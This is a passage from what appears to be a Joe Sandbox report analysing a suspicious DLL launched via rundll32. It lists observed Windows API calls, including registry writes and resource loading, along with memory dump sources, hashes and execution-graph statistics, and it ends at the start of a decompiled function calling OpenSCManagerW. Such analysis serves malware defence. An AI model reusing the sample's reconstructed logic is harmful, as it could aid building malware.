                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4206445780-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                                                            • _swprintf.LIBCMT ref: 10017768
                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4210924919-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                                                            • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3354205298-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                                                            • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                                                            • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3704204646-0
                                                                                                                                                            • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                                                            • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                                                            • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                                                            • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • GetFocus.USER32 ref: 10015607
                                                                                                                                                            • GetParent.USER32(?), ref: 10015615
                                                                                                                                                            • SendMessageA.USER32 ref: 10015628
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4211600527-0
                                                                                                                                                            • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                                                            • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                                                            • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                                                            • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2353593579-0
                                                                                                                                                            • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                                                            • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                                                            • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                                                            • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                                                              • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                                                            • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Item
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 369458955-0
                                                                                                                                                            • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                                            • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                                                            • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                                            • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                                            • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                            • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                                                            • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                            • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3384502665-0
                                                                                                                                                            • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                                            • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                                                            • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                                            • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                                                              • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                                                            • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                                                            • __lock.LIBCMT ref: 1003A581
                                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                                                            • InterlockedIncrement.KERNEL32(00931520), ref: 1003A5C9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2880340415-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,C7783548), ref: 1001DCB3
                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,C7783548), ref: 1001DCC0
                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,C7783548), ref: 1001DCDB
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                                            • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                                            • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                                            • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                                              • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$ActiveEnable$FreeResource
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 253586258-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                                                            • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                                                            • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                                                            • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                                                              • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                                                              • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 685759847-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                            • String ID: (
                                                                                                                                                            • API String ID: 1473721057-3887548279
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 431132790-2766056989
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                                                              • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                                                              • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                                              • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                                              • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                                              • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                                              • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                                              • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                                              • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                                              • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                                              • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                                                            • String ID: %s.dll
                                                                                                                                                            • API String ID: 3444012488-3668843792
                                                                                                                                                            • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                                            • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                                                            • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                                            • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                                                            • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4100373531-0
                                                                                                                                                            • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                                            • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                                                            • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                                            • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2949335588-0
                                                                                                                                                            • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                                            • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                                                            • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                                            • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3253506028-0
                                                                                                                                                            • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                                                            • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                                                            • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                                                            • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3969253408-0
                                                                                                                                                            • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                                            • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                                                            • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                                            • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:15.7%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                            Total number of Nodes:1081
                                                                                                                                                            Total number of Limit Nodes:12

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 250 37912c-3791af call 3820b9 call 38aa30 OpenSCManagerW
                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                            			E0037912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _t24;
